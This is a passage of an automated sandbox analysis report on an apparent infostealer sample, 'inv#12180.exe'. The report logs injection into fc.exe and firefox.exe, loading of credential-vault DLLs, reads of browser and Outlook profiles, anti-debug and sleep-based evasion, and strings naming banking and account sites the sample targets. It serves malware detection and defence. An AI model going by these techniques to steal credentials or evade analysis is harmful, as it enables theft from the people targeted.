              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E970C05_2_02E970C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F3F0CC5_2_02F3F0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E9B1B05_2_02E9B1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC516C5_2_02EC516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E7F1725_2_02E7F172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F5B16B5_2_02F5B16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F416CC5_2_02F416CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02ED56305_2_02ED5630
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4F7B05_2_02F4F7B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E814605_2_02E81460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4F43F5_2_02F4F43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F595C35_2_02F595C3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F2D5B05_2_02F2D5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F475715_2_02F47571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F3DAC65_2_02F3DAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02ED5AA05_2_02ED5AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F31AA35_2_02F31AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F2DAAC5_2_02F2DAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F03A6C5_2_02F03A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F47A465_2_02F47A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4FA495_2_02F4FA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F05BF05_2_02F05BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02ECDBF95_2_02ECDBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EAFB805_2_02EAFB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4FB765_2_02F4FB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E938E05_2_02E938E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EFD8005_2_02EFD800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E999505_2_02E99950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EAB9505_2_02EAB950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F259105_2_02F25910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E99EB05_2_02E99EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4FFB15_2_02F4FFB1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E91F925_2_02E91F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4FF095_2_02F4FF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4FCF25_2_02F4FCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F09C325_2_02F09C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EAFDC05_2_02EAFDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F47D735_2_02F47D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E93D405_2_02E93D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F41D5A5_2_02F41D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006B1FD05_2_006B1FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006ACE805_2_006ACE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006AB07F5_2_006AB07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006AD0A05_2_006AD0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006AB0805_2_006AB080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006A11E75_2_006A11E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006AB1C45_2_006AB1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006AB1D05_2_006AB1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006B56805_2_006B5680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006B387B5_2_006B387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006B38805_2_006B3880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006CBCD05_2_006CBCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFE2F55_2_02CFE2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFE7B35_2_02CFE7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFE4135_2_02CFE413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFE57B5_2_02CFE57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFCB135_2_02CFCB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFD8785_2_02CFD878
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02ED7E54 appears 111 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02E7B970 appears 280 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02F0F290 appears 105 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02EFEA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02EC5130 appears 58 times
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: String function: 014B7E54 appears 102 times
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: String function: 0145B970 appears 280 times
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: String function: 014EF290 appears 105 times
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: String function: 014DEA12 appears 86 times
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: String function: 014A5130 appears 58 times
              Source: inv#12180.exeStatic PE information: No import functions for PE file found
              Source: inv#12180.exe, 00000000.00000003.2501855410.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs inv#12180.exe
              Source: inv#12180.exe, 00000000.00000002.2502269063.0000000001701000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs inv#12180.exe
              Source: inv#12180.exe, 00000000.00000003.2405953655.00000000011F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs inv#12180.exe
              Source: inv#12180.exe, 00000000.00000003.2408019379.00000000013B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs inv#12180.exe
              Source: inv#12180.exe, 00000000.00000003.2501855410.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs inv#12180.exe
              Source: inv#12180.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: inv#12180.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: inv#12180.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@6/6
              Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user\AppData\Local\Temp\17O3k-2IJump to behavior
              Source: inv#12180.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\inv#12180.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fc.exe, 00000005.00000002.3358791223.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3358791223.0000000002AD1000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3358791223.0000000002ACB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: inv#12180.exeVirustotal: Detection: 62%
              Source: inv#12180.exeReversingLabs: Detection: 60%
              Source: unknownProcess created: C:\Users\user\Desktop\inv#12180.exe "C:\Users\user\Desktop\inv#12180.exe"
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\inv#12180.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: inv#12180.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: inv#12180.exe, 00000000.00000003.2501855410.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, YVdkpeLSDe.exe, 00000004.00000002.3359345326.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: inv#12180.exe, 00000000.00000003.2501855410.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, YVdkpeLSDe.exe, 00000004.00000002.3359345326.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YVdkpeLSDe.exe, 00000004.00000000.2421220476.00000000006BE000.00000002.00000001.01000000.00000005.sdmp, YVdkpeLSDe.exe, 00000007.00000000.2568638507.00000000006BE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: inv#12180.exe, 00000000.00000003.2408019379.0000000001286000.00000004.00000020.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000002.2502269063.00000000015CE000.00000040.00001000.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000003.2405953655.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2504125570.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3359751521.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3359751521.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2502130229.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: inv#12180.exe, inv#12180.exe, 00000000.00000003.2408019379.0000000001286000.00000004.00000020.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000002.2502269063.00000000015CE000.00000040.00001000.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000003.2405953655.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000005.00000003.2504125570.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3359751521.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3359751521.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2502130229.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_009090BB pushad ; iretd 0_2_009090E4
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_00903863 push ss; iretd 0_2_00903880
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008F3490 push eax; ret 0_2_008F3492
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_00904DC4 pushfd ; retf 0_2_00904DCE
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014609AD push ecx; mov dword ptr [esp], ecx0_2_014609B6
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeCode function: 4_2_0470049A pushad ; ret 4_2_047004A0
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeCode function: 4_2_0470593F push dword ptr [ecx+44958D42h]; ret 4_2_0470594B
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeCode function: 4_2_0470067A push esi; ret 4_2_0470062D
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeCode function: 4_2_04700332 push edx; ret 4_2_0470033C
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeCode function: 4_2_04706FDF push esi; ret 4_2_04706FE3
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeCode function: 4_2_04708395 push eax; ret 4_2_04708397
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E809AD push ecx; mov dword ptr [esp], ecx5_2_02E809B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E51368 push eax; iretd 5_2_02E51369
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006BB011 push cs; retf 5_2_006BB01A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006B1931 pushfd ; retf 5_2_006B193B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006BB98E push FFFFFFADh; ret 5_2_006BB990
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006BBB69 push ecx; ret 5_2_006BBB6A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006B5C28 pushad ; iretd 5_2_006B5C51
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006BDD8B push eax; iretd 5_2_006BDDEC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02D05202 push eax; ret 5_2_02D05204
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFB3C8 push edi; ret 5_2_02CFB445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFB3C4 push edi; ret 5_2_02CFB445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFC033 push ss; iretd 5_2_02CFC036
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CF71EA push es; ret 5_2_02CF71EB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFBA5F push cs; retf 5_2_02CFBA67
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02CFAE60 push ds; retf 5_2_02CFAE61
              Source: inv#12180.exeStatic PE information: section name: .text entropy: 7.9952540999254795
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A096E rdtsc 0_2_014A096E
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 9841Jump to behavior
              Source: C:\Users\user\Desktop\inv#12180.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.6 %
              Source: C:\Windows\SysWOW64\fc.exe TID: 6196Thread sleep count: 132 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 6196Thread sleep time: -264000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 6196Thread sleep count: 9841 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 6196Thread sleep time: -19682000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe TID: 6140Thread sleep time: -35000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006BC870 FindFirstFileW,FindNextFileW,FindClose,5_2_006BC870
              Source: 17O3k-2I.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: 17O3k-2I.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: 17O3k-2I.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: 17O3k-2I.5.drBinary or memory string: discord.comVMware20,11696487552f
              Source: 17O3k-2I.5.drBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: 17O3k-2I.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: 17O3k-2I.5.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: 17O3k-2I.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: 17O3k-2I.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: 17O3k-2I.5.drBinary or memory string: global block list test formVMware20,11696487552
              Source: 17O3k-2I.5.drBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: 17O3k-2I.5.drBinary or memory string: AMC password management pageVMware20,11696487552
              Source: 17O3k-2I.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: firefox.exe, 00000009.00000002.2794480941.000001A1901AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 17O3k-2I.5.drBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: 17O3k-2I.5.drBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: 17O3k-2I.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: YVdkpeLSDe.exe, 00000007.00000002.3359275130.000000000071F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
              Source: 17O3k-2I.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: fc.exe, 00000005.00000002.3358791223.0000000002A00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm M@
              Source: 17O3k-2I.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: 17O3k-2I.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: 17O3k-2I.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: 17O3k-2I.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: 17O3k-2I.5.drBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: 17O3k-2I.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: 17O3k-2I.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: 17O3k-2I.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: 17O3k-2I.5.drBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: 17O3k-2I.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: 17O3k-2I.5.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: 17O3k-2I.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: 17O3k-2I.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: 17O3k-2I.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\inv#12180.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\inv#12180.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A096E rdtsc 0_2_014A096E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_00907CA3 LdrLoadDll,0_2_00907CA3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F4144 mov eax, dword ptr fs:[00000030h]0_2_014F4144
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F4144 mov eax, dword ptr fs:[00000030h]0_2_014F4144
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F4144 mov ecx, dword ptr fs:[00000030h]0_2_014F4144
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F4144 mov eax, dword ptr fs:[00000030h]0_2_014F4144
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F4144 mov eax, dword ptr fs:[00000030h]0_2_014F4144
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466154 mov eax, dword ptr fs:[00000030h]0_2_01466154
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466154 mov eax, dword ptr fs:[00000030h]0_2_01466154
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145C156 mov eax, dword ptr fs:[00000030h]0_2_0145C156
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F8158 mov eax, dword ptr fs:[00000030h]0_2_014F8158
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01520115 mov eax, dword ptr fs:[00000030h]0_2_01520115
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150A118 mov ecx, dword ptr fs:[00000030h]0_2_0150A118
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150A118 mov eax, dword ptr fs:[00000030h]0_2_0150A118
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150A118 mov eax, dword ptr fs:[00000030h]0_2_0150A118
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150A118 mov eax, dword ptr fs:[00000030h]0_2_0150A118
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov eax, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov ecx, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov eax, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov eax, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov ecx, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov eax, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov eax, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov ecx, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov eax, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150E10E mov ecx, dword ptr fs:[00000030h]0_2_0150E10E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01490124 mov eax, dword ptr fs:[00000030h]0_2_01490124
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015261C3 mov eax, dword ptr fs:[00000030h]0_2_015261C3
